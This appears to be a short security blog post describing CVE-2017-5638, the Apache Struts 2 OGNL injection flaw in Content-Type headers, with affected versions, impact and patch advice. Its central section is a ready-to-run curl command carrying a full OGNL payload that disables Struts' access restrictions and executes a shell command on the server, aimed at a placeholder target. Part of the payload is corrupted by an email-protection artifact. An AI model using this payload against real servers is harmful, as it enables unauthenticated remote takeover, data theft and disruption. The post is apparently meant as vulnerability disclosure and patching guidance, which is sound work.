Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts2-based application, the parser attempts to process it to generate an error message. However, it incorrectly interprets the header’s parameters. An attacker can embed an Object-Graph Navigation Language (OGNL) expression within the Content-Type header itself. During the failed parsing attempt, the framework unsafely evaluates this user-supplied OGNL expression. Since OGNL expressions can execute arbitrary Java code, this flaw allows an unauthenticated remote attacker to achieve full command execution on the underlying server with the privileges of the application container, simply by crafting a malicious HTTP request with the exploit code placed in the Content-Type header field.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/showcase.action`
How Exploit:
Malicious HTTP Request
OGNL Expression Injection
Remote Shell Execution
Protection from this CVE
Apply Struts Patch
Upgrade to 2.3.32 or 2.5.10.1
WAF Filtering Headers
Impact:
Complete System Compromise
Arbitrary Code Execution
Data Theft, Service Disruption
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

